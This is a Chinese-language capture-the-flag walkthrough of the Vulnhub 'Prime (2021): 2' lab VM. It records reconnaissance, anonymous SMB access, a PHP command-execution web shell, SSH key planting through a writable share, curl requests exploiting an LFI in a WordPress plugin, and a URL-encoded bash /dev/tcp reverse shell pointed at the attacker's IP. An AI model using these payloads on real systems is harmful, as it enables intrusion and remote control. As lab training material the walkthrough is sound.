【Vulnhub 靶场】【Prime (2021): 2】【简单 - 中等】【20210509】

1、环境介绍

靶场介绍:https://www.vulnhub.com/entry/prime-2021-2,696/
靶场下载:https://download.vulnhub.com/prime-2021/Prime-2.ova
靶场难度:简单 - 中等
发布日期:2021年5月9日
文件大小:3.7 GB
靶场作者:Sura
靶场系列:Prime (2021)
靶场描述

  • 这个虚拟机将给你一些全球级认证所需的真实概念。你会喜欢这个虚拟机,因为它是网络和网络测试的完美结合。
  • VMware 打开,不适用 VirtualBox

打靶耗时:4+小时,存在两条打靶路线,殊途同归,算是中规中矩,打靶路线清晰,我个人则是本着练习的目的,多尝试了一些其他思路
打靶关键

  1. SMB 信息收集 与 操作
  2. Web 目录扫描、WordPress CMS扫描
  3. LXD 提权

2、主机发现与端口扫描

  • 攻击机 IP: 192.168.110.139
  • 靶 机 IP: 192.168.110.138
(base) ┌──(root㉿kali)-[~]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:5c:06:40, IPv4: 192.168.110.139
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.110.1   00:50:56:c0:00:01       VMware, Inc.
192.168.110.138 00:0c:29:52:42:78       VMware, Inc.
192.168.110.254 00:50:56:e0:2b:92       VMware, Inc.3 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.318 seconds (110.44 hosts/sec). 3 responded
(base) ┌──(root㉿kali)-[~]
└─# nmap -T4 -sC -sV -p- -A --min-rate=1000 192.168.110.138
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-04 00:32 EST
Nmap scan report for 192.168.110.138
Host is up (0.0017s latency).
Not shown: 65530 closed tcp ports (reset)
PORT      STATE SERVICE     VERSION
22/tcp    open  ssh         OpenSSH 8.4p1 Ubuntu 5ubuntu1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 0a:16:3f:c8:1a:7d:ff:f5:7a:66:05:63:76:7c:5a:95 (RSA)
|   256 7f:47:44:cc:d1:c4:b7:54:de:4f:27:f2:39:38:ff:6e (ECDSA)
|_  256 f5:d3:36:44:43:40:3d:11:9b:d1:a6:24:9f:99:93:f7 (ED25519)
80/tcp    open  http        Apache httpd 2.4.46 ((Ubuntu))
|_http-server-header: Apache/2.4.46 (Ubuntu)
|_http-title: HackerCTF
139/tcp   open  netbios-ssn Samba smbd 4.6.2
445/tcp   open  netbios-ssn Samba smbd 4.6.2
10123/tcp open  http        SimpleHTTPServer 0.6 (Python 3.9.4)
|_http-title: Directory listing for /
|_http-server-header: SimpleHTTP/0.6 Python/3.9.4
MAC Address: 00:0C:29:52:42:78 (VMware)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelHost script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required
|_nbstat: NetBIOS name: HACKERCTFLAB, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb2-time: 
|   date: 2023-12-04T13:33:03
|_  start_date: N/A
|_clock-skew: 7h59m49sTRACEROUTE
HOP RTT     ADDRESS
1   1.69 ms 192.168.110.138OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 42.70 seconds

3、端口访问

3.1、22端口 - SSH

  • 初步访问,提示信息收集
(base) ┌──(root㉿kali)-[~]
└─# ssh 192.168.110.138                    
The authenticity of host '192.168.110.138 (192.168.110.138)' can·t be established.
ED25519 key fingerprint is SHA256:nB+xRANNsBufP64KnDjxamkvfGVw1eJUiz/kCMnJ9wU.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.110.138' (ED25519) to the list of known hosts.
root@192.168.110.138·s password: 
Permission denied, please try again.
root@192.168.110.138·s password: 
Permission denied, please try again.
root@192.168.110.138·s password: 
root@192.168.110.138: Permission denied (publickey,password).

3.2、139/445端口 - SMB

  • 好家伙,这一条命令用了一个小时。。。好在收获颇丰!(●´∀`●)ノ
  • 获取信息:
    • 存在一个免密的共享文件夹://192.168.110.138/welcome
      • 经验证是「/home/jarves
    • 发现一个用户:jarves,并且主目录权限是 755
    • 主目录下发现了一个:一句话木马
      • 后续着重查找「文件包含漏洞(LFI)
    • 数据库历史文件中获取:_HiStOrY_V2_
    • 经测试可以上传文件!!!
      • 尝试上传「.ssh」文件,进行免密登录
(base) ┌──(root㉿kali)-[~]
└─# enum4linux 192.168.110.138
Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Mon Dec  4 00:44:43 2023=========================================( Target Information )=========================================Target ........... 192.168.110.138
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none==========================( Enumerating Workgroup/Domain on 192.168.110.138 )==========================[+] Got domain/workgroup name: WORKGROUP==============================( Nbtstat Information for 192.168.110.138 )==============================Looking up status of 192.168.110.138HACKERCTFLAB    <00> -         B <ACTIVE>  Workstation ServiceHACKERCTFLAB    <03> -         B <ACTIVE>  Messenger ServiceHACKERCTFLAB    <20> -         B <ACTIVE>  File Server ServiceWORKGROUP       <00> - <GROUP> B <ACTIVE>  Domain/Workgroup NameWORKGROUP       <1e> - <GROUP> B <ACTIVE>  Browser Service ElectionsMAC Address = 00-00-00-00-00-00==================================( Session Check on 192.168.110.138 )==================================[+] Server 192.168.110.138 allows sessions using username '', password ''===============================( Getting domain SID for 192.168.110.138 )===============================Domain Name: WORKGROUP
Domain Sid: (NULL SID)[+] Can·t determine if host is part of domain or part of a workgroup=================================( OS information on 192.168.110.138 )=================================[E] Can·t get OS info with smbclient[+] Got OS info for 192.168.110.138 from srvinfo: HACKERCTFLAB   Wk Sv PrQ Unx NT SNT hackerctflab server (Samba, Ubuntu)platform_id     :       500os version      :       6.1server type     :       0x809a03======================================( Users on 192.168.110.138 )======================================Use of uninitialized value $users in print at ./enum4linux.pl line 972.
Use of uninitialized value $users in pattern match (m//) at ./enum4linux.pl line 975.Use of uninitialized value $users in print at ./enum4linux.pl line 986.
Use of uninitialized value $users in pattern match (m//) at ./enum4linux.pl line 988.================================( Share Enumeration on 192.168.110.138 )================================smbXcli_negprot_smb1_done: No compatible protocol selected by server.Sharename       Type      Comment---------       ----      -------print$          Disk      Printer Driverswelcome         Disk      Welcome to Hackerctf LABIPC$            IPC       IPC Service (hackerctflab server (Samba, Ubuntu))
Reconnecting with SMB1 for workgroup listing.
Protocol negotiation to server 192.168.110.138 (for a protocol between LANMAN1 and NT1) failed: NT_STATUS_INVALID_NETWORK_RESPONSE
Unable to connect with SMB1 -- no workgroup available[+] Attempting to map shares on 192.168.110.138//192.168.110.138/print$        Mapping: DENIED Listing: N/A Writing: N/A
//192.168.110.138/welcome       Mapping: OK Listing: OK Writing: N/A[E] Can·t understand response:NT_STATUS_OBJECT_NAME_NOT_FOUND listing \*
//192.168.110.138/IPC$  Mapping: N/A Listing: N/A Writing: N/A==========================( Password Policy Information for 192.168.110.138 )==========================[+] Attaching to 192.168.110.138 using a NULL share[+] Trying protocol 139/SMB...[+] Found domain(s):[+] HACKERCTFLAB[+] Builtin[+] Password Info for Domain: HACKERCTFLAB[+] Minimum password length: 5[+] Password history length: None[+] Maximum password age: 37 days 6 hours 21 minutes [+] Password Complexity Flags: 000000[+] Domain Refuse Password Change: 0[+] Domain Password Store Cleartext: 0[+] Domain Password Lockout Admins: 0[+] Domain Password No Clear Change: 0[+] Domain Password No Anon Change: 0[+] Domain Password Complex: 0[+] Minimum password age: None[+] Reset Account Lockout Counter: 30 minutes [+] Locked Account Duration: 30 minutes [+] Account Lockout Threshold: None[+] Forced Log off Time: 37 days 6 hours 21 minutes [+] Retieved partial password policy with rpcclient:Password Complexity: Disabled
Minimum Password Length: 5=====================================( Groups on 192.168.110.138 )=====================================[+]  Getting builtin groups:
[+]  Getting builtin group memberships:
[+]  Getting local groups:
[+]  Getting local group memberships:
[+]  Getting domain groups:
[+]  Getting domain group memberships:=================( Users on 192.168.110.138 via RID cycling (RIDS: 500-550,1000-1050) )=================[I] Found new SID: 
S-1-22-1[I] Found new SID: 
S-1-5-32[I] Found new SID: 
S-1-5-32[I] Found new SID: 
S-1-5-32[I] Found new SID: 
S-1-5-32[+] Enumerating users using SID S-1-5-32 and logon username '', password ''S-1-5-32-544 BUILTIN\Administrators (Local Group)
S-1-5-32-545 BUILTIN\Users (Local Group)
S-1-5-32-546 BUILTIN\Guests (Local Group)
S-1-5-32-547 BUILTIN\Power Users (Local Group)
S-1-5-32-548 BUILTIN\Account Operators (Local Group)
S-1-5-32-549 BUILTIN\Server Operators (Local Group)
S-1-5-32-550 BUILTIN\Print Operators (Local Group)[+] Enumerating users using SID S-1-5-21-1614152883-4007063313-3639854138 and logon username '', password ''S-1-5-21-1614152883-4007063313-3639854138-501 HACKERCTFLAB\nobody (Local User)
S-1-5-21-1614152883-4007063313-3639854138-513 HACKERCTFLAB\None (Domain Group)[+] Enumerating users using SID S-1-22-1 and logon username '', password ''S-1-22-1-1000 Unix User\jarves (Local User)==============================( Getting printer info for 192.168.110.138 )==============================No printers returned.enum4linux complete on Mon Dec  4 14:40:39 2023

3.2.1、免密登录 SMB

  • 看上去好像是「/home」文件夹
(base) ┌──(root㉿kali)-[/usr/local/soft/hack]
└─# smbclient //192.168.110.138/welcome                                             
Password for [WORKGROUP\root]:
Try "help" to get a list of possible commands.
smb: \> ls.                                   D        0  Sat May  8 15:42:49 2021..                                  D        0  Sat May  8 02:38:58 2021.mysql_history                      H       18  Sat May  8 15:05:03 2021.profile                            H      807  Sat Mar 20 00:02:58 2021upload                              D        0  Sun May  9 19:19:02 2021.sudo_as_admin_successful           H        0  Sat May  8 13:34:48 2021.bash_logout                        H      220  Sat Mar 20 00:02:58 2021.cache                             DH        0  Sat May  8 02:39:15 2021something                           N       82  Sat May  8 00:18:09 2021secrets                             N        0  Sat May  8 00:15:17 2021.bash_history                       H       72  Sun May  9 19:23:26 2021.bashrc                             H     3771  Sat Mar 20 00:02:58 202119475088 blocks of size 1024. 9580192 blocks available

3.2.2、信息收集

smb: \> cd upload
smb: \upload\> ls.                                   D        0  Sun May  9 19:19:02 2021..                                  D        0  Sat May  8 15:42:49 2021shell.php                           A       35  Sun May  9 19:19:02 202119475088 blocks of size 1024. 9580164 blocks available
smb: \> get something
getting file \something of size 82 as something (5.7 KiloBytes/sec) (average 5.7 KiloBytes/sec)
smb: \> get .bash_history bash_history
getting file \.bash_history of size 72 as bash_history (3.3 KiloBytes/sec) (average 4.3 KiloBytes/sec)
smb: \> get .mysql_history mysql_history
getting file \.mysql_history of size 18 as mysql_history (1.5 KiloBytes/sec) (average 54.0 KiloBytes/sec)
smb: \> cd upload
smb: \upload\> get shell.php 
getting file \upload\shell.php of size 35 as shell.php (3.1 KiloBytes/sec) (average 64.5 KiloBytes/sec)
(base) ┌──(root㉿kali)-[/usr/local/soft/hack]
└─# cat something            
I wanted to make it my home directory. But idea must be changed.
我想把它作为我的主目录。但这个想法必须改变。Thanks,
jarves(base) ┌──(root㉿kali)-[/usr/local/soft/hack]
└─# cat bash_history 
sudo su -
ifconfig
ls
cd upload/
ls
ls -l
cd ..
ls -l
chmod 755 jarves/(base) ┌──(root㉿kali)-[/usr/local/soft/hack]
└─# cat mysql_history   
_HiStOrY_V2_
exit(base) ┌──(root㉿kali)-[/usr/local/soft/hack]
└─# cat shell.php 
<?php echo system($_GET['cmd']);?>

3.2.3、尝试上传 秘钥到 「.ssh」(到这里就已经 getshell 了)

  • 不过,后面依然正常信息收集,否则这样太快了吧 (⊙ˍ⊙)
  • 可以直接跳到「第 7 节
(base) ┌──(root㉿kali)-[/usr/local/soft/hack]
└─# ssh-keygen -f patrick
Generating public/private rsa key pair.
Enter passphrase (empty for no passphrase): 
Enter same passphrase again: 
Your identification has been saved in patrick
Your public key has been saved in patrick.pub
The key fingerprint is:
SHA256:XFa0aqVJED/BYuhoEu/ZKkvTVycjqpnBzlsyXJrZZ4s root@kali
The key's randomart image is:
+---[RSA 3072]----+
|       .oo..o    |
|  .   . oo.o .   |
|   o o . .* o    |
|  . + .. + *     |
|   +.o. S *      |
| o Bo..o =       |
|  % =.+          |
| +.X.= .         |
|  O+E .          |
+----[SHA256]-----+(base) ┌──(root㉿kali)-[/usr/local/soft/hack]
└─# cp patrick.pub authorized_keys(base) ┌──(root㉿kali)-[/usr/local/soft/hack]
└─# chmod 600 patrick(base) ┌──(root㉿kali)-[/usr/local/soft/hack]
└─# smbclient //192.168.110.138/welcome
Password for [WORKGROUP\root]:
Try "help" to get a list of possible commands.
smb: \> mkdir .ssh
smb: \> cd .ssh
smb: \.ssh\> put authorized_keys 
putting file authorized_keys as \.ssh\authorized_keys (68.7 kb/s) (average 68.7 kb/s)
smb: \.ssh\> ls.                                   D        0  Mon Dec  4 21:51:11 2023..                                  D        0  Mon Dec  4 21:51:01 2023authorized_keys                     A      563  Mon Dec  4 21:51:11 202319475088 blocks of size 1024. 10125796 blocks available
smb: \.ssh\> exit
(base) ┌──(root㉿kali)-[/usr/local/soft/hack]
└─# ssh jarves@192.168.110.138 -i patrick
Welcome to Ubuntu 21.04 (GNU/Linux 5.11.0-16-generic x86_64)* Documentation:  https://help.ubuntu.com* Management:     https://landscape.canonical.com* Support:        https://ubuntu.com/advantageSystem information as of Mon Dec  4 01:52:40 PM UTC 2023System load: 0.11               Memory usage: 17%   Processes:       233Usage of /:  42.8% of 18.57GB   Swap usage:   0%    Users logged in: 0=> There were exceptions while processing one or more plugins. See/var/log/landscape/sysinfo.log for more information.* Pure upstream Kubernetes 1.21, smallest, simplest cluster ops!https://microk8s.io/9 updates can be installed immediately.
0 of these updates are security updates.
To see these additional updates run: apt list --upgradableThe list of available updates is more than a week old.
To check for new updates run: sudo apt updateLast login: Sun May  9 11:14:10 2021
jarves@hackerctflab:~$

3.3、80端口 - Web

  • 获取信息整理:
    • 发现存在「.git」文件
    • 发现存在「WordPress」
    • 「server」目录有个压缩文件

3.3.1、目录扫描

# 基础小字典,初扫摸底
dirb http://192.168.110.138
# 较全面 conda activate py37
dirsearch -u http://192.168.110.138 -t 64 -e *
# 包含静态检查 conda activate py310
cd ~/dirsearch_bypass403 ; python dirsearch.py -u "http://192.168.110.138" -j yes -b yes
# 较全面 Plus conda activate py39
cd ~/soft/dirmap ; python3 dirmap.py -i http://192.168.110.138 -lcf
# 常规文件扫描
gobuster dir -u http://192.168.110.138 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 64 -x txt,php,html,conf -e -k -r -q
# 可执行文件扫描
gobuster dir -u http://192.168.110.138 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 64 -x js,aspx,cgi,sh,jsp -e -k -r -q
# 压缩包,备份扫描
gobuster dir -u http://192.168.110.138 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 64 -x rar,zip,7z,tar.gz,bak,php.bak,txt,old,temp -e -k -r -q
  • http://192.168.110.138/index.html
  • http://192.168.110.138/wp/index.php
  • http://192.168.110.138/wp/wp-login.php
  • http://192.168.110.138/css/
  • http://192.168.110.138/images/
  • http://192.168.110.138/javascript/
  • http://192.168.110.138/server/
  • http://192.168.110.138/wp/
  • http://192.168.110.138/wp/.git/
  • http://192.168.110.138/wp/wp-admin/
  • http://192.168.110.138/wp/wp-content/uploads/

在这里插入图片描述

3.3.2、「server」文件下载/解压

  • 是一个存在「RCE」漏洞的「CMS」,但是当前不知道哪里使用了
(base) ┌──(root㉿kali)-[/usr/local/soft/hack]
└─# unzip 45f8b764b45cdb6d75cda2ab01231293-gila-1.10.9.zip
Archive:  45f8b764b45cdb6d75cda2ab01231293-gila-1.10.9.zip
14b1c3e707ec8cd33b353c7b2ec7067202933cd2creating: gila-1.10.9/
......(base) ┌──(root㉿kali)-[/usr/local/soft/hack]
└─# cd gila-1.10.9 (base) ┌──(root㉿kali)-[/usr/local/soft/hack/gila-1.10.9]
└─# ls -al
总计 68
drwxr-xr-x  9 root root 4096 20197月10日 .
drwxr-xr-x  5 root root 4096 12419:39 ..
-rw-r--r--  1 root root  241 20197月10日 app.yaml
drwxr-xr-x  2 root root 4096 20197月10日 assets
-rw-r--r--  1 root root  131 20197月10日 composer.json
-rwxr-xr-x  1 root root  653 20197月10日 config.default.php
-rw-r--r--  1 root root  639 20197月10日 Dockerfile
-rwxr-xr-x  1 root root 1065 20197月10日 .htaccess
-rwxr-xr-x  1 root root  143 20197月10日 index.php
drwxr-xr-x 11 root root 4096 20197月10日 lib
-rwxr-xr-x  1 root root 1526 20197月10日 LICENSE
drwxr-xr-x  2 root root 4096 20197月10日 log
-rw-r--r--  1 root root   65 20197月10日 robots.txt
drwxr-xr-x  2 root root 4096 20197月10日 sites
drwxr-xr-x  9 root root 4096 20197月10日 src
drwxr-xr-x  4 root root 4096 20197月10日 themes
drwxr-xr-x  2 root root 4096 20197月10日 tmp

在这里插入图片描述

3.3.3、下载「.git」

  • 打开报错,未找到处理方式,暂时搁置
(py27) ┌──(root㉿kali)-[/usr/local/soft/GitHack]
└─# python GitHack.py http://192.168.110.138/wp/.git/____ _ _   _   _            _/ ___(_) |_| | | | __ _  ___| | __
| |  _| | __| |_| |/ _` |/ __| |/ /
| |_| | | |_|  _  | (_| | (__|   <\____|_|\__|_| |_|\__,_|\___|_|\_\{0.0.5}A '.git' folder disclosure exploit.[*] Check Depends
[+] Check depends end
[*] Set Paths
[*] Target Url: http://192.168.110.138/wp/.git/
[*] Initialize Target
[*] Try to Clone straightly
[*] Clone
正克隆到 '/usr/local/soft/GitHack/dist/192.168.110.138'...
致命错误:仓库 'http://192.168.110.138/wp/.git/' 未找到
[-] Clone Error
[*] Try to Clone with Directory Listing
[*] http://192.168.110.138/wp/.git/ is support Directory Listing
[*] Initialize Git
[!] Initialize Git Error: 提示:使用 'master' 作为初始分支的名称。这个默认分支名称可能会更改。要在新仓 库中
提示:配置使用初始分支名,并消除这条警告,请执行:
提示:
提示:  git config --global init.defaultBranch <名称>
提示:
提示:除了 'master' 之外,通常选定的名字有 'main''trunk''development'。
提示:可以通过以下命令重命名刚创建的分支:
提示:
提示:  git branch -m <name>
......
[*] objects/3d/4f6056f57c26f22d4d2b0c3068731de0074040
[*] objects/34/1a6dc84dc556eb30ac23b7ac42858e6ce128a6
[*] Valid Repository
[*] Valid Repository Fail
[-] Clone With Cache end. But missed some files.[+] Clone Success. Dist File : /usr/local/soft/GitHack/dist/192.168.110.138

3.3.4、WordPress CMS 扫描

  • 版本:WordPress version 5.8
  • 主题:http://192.168.110.138/wp/wp-content/themes/twentytwentyone/
  • 漏洞:插件漏洞 - CVE-2019-9618(LFI)(46537)(需要使用 api-token 才能扫描到)
  • 用户:admin
(base) ┌──(root㉿kali)-[/usr/local/soft/hack]
└─# wpscan --url=http://192.168.110.138/wp/ --ignore-main-redirect --force -e --plugins-detection aggressive --api-token [token]
_________________________________________________________________          _______   _____\ \        / /  __ \ / ____|\ \  /\  / /| |__) | (___   ___  __ _ _ __ ®\ \/  \/ / |  ___/ \___ \ / __|/ _` | ·_ \\  /\  /  | |     ____) | (__| (_| | | | |\/  \/   |_|    |_____/ \___|\__,_|_| |_|WordPress Security Scanner by the WPScan TeamVersion 3.8.25Sponsored by Automattic - https://automattic.com/@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________[+] URL: http://192.168.110.138/wp/ [192.168.110.138]
[+] Started: Mon Dec  4 19:30:43 2023Interesting Finding(s):[+] Headers| Interesting Entry: Server: Apache/2.4.46 (Ubuntu)| Found By: Headers (Passive Detection)| Confidence: 100%[+] XML-RPC seems to be enabled: http://192.168.110.138/wp/xmlrpc.php| Found By: Direct Access (Aggressive Detection)| Confidence: 100%| References:|  - http://codex.wordpress.org/XML-RPC_Pingback_API|  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/|  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/|  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/|  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/[+] WordPress readme found: http://192.168.110.138/wp/readme.html| Found By: Direct Access (Aggressive Detection)| Confidence: 100%[+] Upload directory has listing enabled: http://192.168.110.138/wp/wp-content/uploads/| Found By: Direct Access (Aggressive Detection)| Confidence: 100%[+] The external WP-Cron seems to be enabled: http://192.168.110.138/wp/wp-cron.php| Found By: Direct Access (Aggressive Detection)| Confidence: 60%| References:|  - https://www.iplocation.net/defend-wordpress-from-ddos|  - https://github.com/wpscanteam/wpscan/issues/1299[+] WordPress version 5.8 identified (Insecure, released on 2021-07-20).| Found By: Emoji Settings (Passive Detection)|  - http://192.168.110.138/wp/, Match: 'wp-includes\/js\/wp-emoji-release.min.js?ver=5.8'| Confirmed By: Meta Generator (Passive Detection)|  - http://192.168.110.138/wp/, Match: 'WordPress 5.8'|| [!] 36 vulnerabilities identified:|| [!] Title: WordPress 5.4 to 5.8 - Data Exposure via REST API|     Fixed in: 5.8.1|     References:|      - https://wpscan.com/vulnerability/38dd7e87-9a22-48e2-bab1-dc79448ecdfb|      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-39200|      - https://wordpress.org/news/2021/09/wordpress-5-8-1-security-and-maintenance-release/|      - https://github.com/WordPress/wordpress-develop/commit/ca4765c62c65acb732b574a6761bf5fd84595706|      - https://github.com/WordPress/wordpress-develop/security/advisories/GHSA-m9hc-7v5q-x8q5|
......
[+] WordPress theme in use: twentytwentyone| Location: http://192.168.110.138/wp/wp-content/themes/twentytwentyone/| Last Updated: 2023-11-07T00:00:00.000Z| Readme: http://192.168.110.138/wp/wp-content/themes/twentytwentyone/readme.txt| [!] The version is out of date, the latest version is 2.0| Style URL: http://192.168.110.138/wp/wp-content/themes/twentytwentyone/style.css?ver=1.3| Style Name: Twenty Twenty-One| Style URI: https://wordpress.org/themes/twentytwentyone/| Description: Twenty Twenty-One is a blank canvas for your ideas and it makes the block editor your best brush. Wi...| Author: the WordPress team| Author URI: https://wordpress.org/|| Found By: Css Style In Homepage (Passive Detection)|| Version: 1.3 (80% confidence)| Found By: Style (Passive Detection)|  - http://192.168.110.138/wp/wp-content/themes/twentytwentyone/style.css?ver=1.3, Match: 'Version: 1.3'[+] Enumerating Vulnerable Plugins (via Aggressive Methods)Checking Known Locations - Time: 00:00:23 <=====================> (6539 / 6539) 100.00% Time: 00:00:23
[+] Checking Plugin Versions (via Passive and Aggressive Methods)[i] Plugin(s) Identified:[+] gracemedia-media-player| Location: http://192.168.110.138/wp/wp-content/plugins/gracemedia-media-player/| Latest Version: 1.0 (up to date)| Last Updated: 2013-07-21T15:09:00.000Z| Readme: http://192.168.110.138/wp/wp-content/plugins/gracemedia-media-player/readme.txt| [!] Directory listing is enabled|| Found By: Known Locations (Aggressive Detection)|  - http://192.168.110.138/wp/wp-content/plugins/gracemedia-media-player/, status: 200|| [!] 1 vulnerability identified:|| [!] Title: GraceMedia Media Player 1.0 - Local File Inclusion (LFI)|     References:|      - https://wpscan.com/vulnerability/a4f5b10f-3386-45cc-9548-dd7bbea199d6|      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9618|      - https://www.exploit-db.com/exploits/46537/|      - https://seclists.org/fulldisclosure/2019/Mar/26|| Version: 1.0 (100% confidence)| Found By: Readme - Stable Tag (Aggressive Detection)|  - http://192.168.110.138/wp/wp-content/plugins/gracemedia-media-player/readme.txt| Confirmed By: Readme - ChangeLog Section (Aggressive Detection)|  - http://192.168.110.138/wp/wp-content/plugins/gracemedia-media-player/readme.txt......
[i] User(s) Identified:[+] admin| Found By: Author Posts - Author Pattern (Passive Detection)| Confirmed By:|  Rss Generator (Passive Detection)|  Author Id Brute Forcing - Author Pattern (Aggressive Detection)|  Login Error Messages (Aggressive Detection)[+] WPScan DB API OK| Plan: free| Requests Done (during the scan): 4| Requests Remaining: 21[+] Finished: Mon Dec  4 19:31:36 2023
[+] Requests Done: 10113
[+] Cached Requests: 12
[+] Data Sent: 2.832 MB
[+] Data Received: 1.891 MB
[+] Memory used: 253.559 MB
[+] Elapsed time: 00:00:52

3.4、10123端口 - SMB 的 Web 服务

  • 点击文件,即下载

在这里插入图片描述

4、46537:CVE-2019-9618(LFI)漏洞利用

4.1、漏洞下载 并 查看利用方式

(base) ┌──(root㉿kali)-[/usr/local/soft/hack]
└─# searchsploit 46537
-------------------------------------------------------------------- ---------------------------------Exploit Title                                                      |  Path
-------------------------------------------------------------------- ---------------------------------
WordPress Plugin GraceMedia Media Player 1.0 - Local File Inclusion | php/webapps/46537.txt
-------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results(base) ┌──(root㉿kali)-[/usr/local/soft/hack]
└─# searchsploit -m 46537.txtExploit: WordPress Plugin GraceMedia Media Player 1.0 - Local File InclusionURL: https://www.exploit-db.com/exploits/46537Path: /usr/share/exploitdb/exploits/php/webapps/46537.txtCodes: CVE-2019-9618Verified: False
File Type: Unicode text, UTF-8 text
Copied to: /usr/local/soft/hack/46537.txt(base) ┌──(root㉿kali)-[/usr/local/soft/hack]
└─# cat 46537.txt 
=============================================
MGC ALERT 2019-001
- Original release date: February 06, 2019
- Last revised:  March 13, 2019
- Discovered by: Manuel García Cárdenas
- Severity: 7/10 (CVSS Base Score)
- CVE-ID: CVE-2019-9618
=============================================
......
GET
/wordpress/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds&cfg=../../../../../../../../../../etc/passwd
......

4.2、Poc构造

4.2.1、验证漏洞

(base) ┌──(root㉿kali)-[/usr/local/soft/hack]
└─# curl "http://192.168.110.138/wp/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds&cfg=../../../../../../../../../../etc/passwd"
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:106::/nonexistent:/usr/sbin/nologin
syslog:x:104:110::/home/syslog:/usr/sbin/nologin
_apt:x:105:65534::/nonexistent:/usr/sbin/nologin
tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false
uuidd:x:107:112::/run/uuidd:/usr/sbin/nologin
tcpdump:x:108:113::/nonexistent:/usr/sbin/nologin
landscape:x:109:115::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:110:1::/var/cache/pollinate:/bin/false
usbmux:x:111:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
sshd:x:112:65534::/run/sshd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
jarves:x:1000:1000:jarves:/home/jarves:/bin/bash
lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false
mysql:x:113:117:MySQL Server,,,:/nonexistent:/bin/false

4.2.2、利用漏洞,访问「/home/jarves/upload/shell.php」

(base) ┌──(root㉿kali)-[/usr/local/soft/hack]
└─# curl "http://192.168.110.138/wp/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds&cfg=../../../../../../../../../../home/jarves/upload/shell.php"(base) ┌──(root㉿kali)-[/usr/local/soft/hack]
└─# curl "http://192.168.110.138/wp/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds&cfg=../../../../../../../../../../home/jarves/upload/shell.php&cmd=id"
uid=33(www-data) gid=33(www-data) groups=33(www-data)
uid=33(www-data) gid=33(www-data) groups=33(www-data)

4.2.3、蚁剑连接失败

不知道为啥蚁剑经常连接失败。。。可能是我用的不对吧

5、反弹连接

  • 反弹连接命令采用URL编码
(base) ┌──(root㉿kali)-[/usr/local/soft/hack]
└─# echo $(python3 -c "import urllib.parse; print(urllib.parse.quote('''bash -c 'bash -i >& /dev/tcp/192.168.110.139/10086 0>&1''', safe=''))")
bash%20-c%20%27bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.110.139%2F10086%200%3E%26
(base) ┌──(root㉿kali)-[/usr/local/soft/hack]
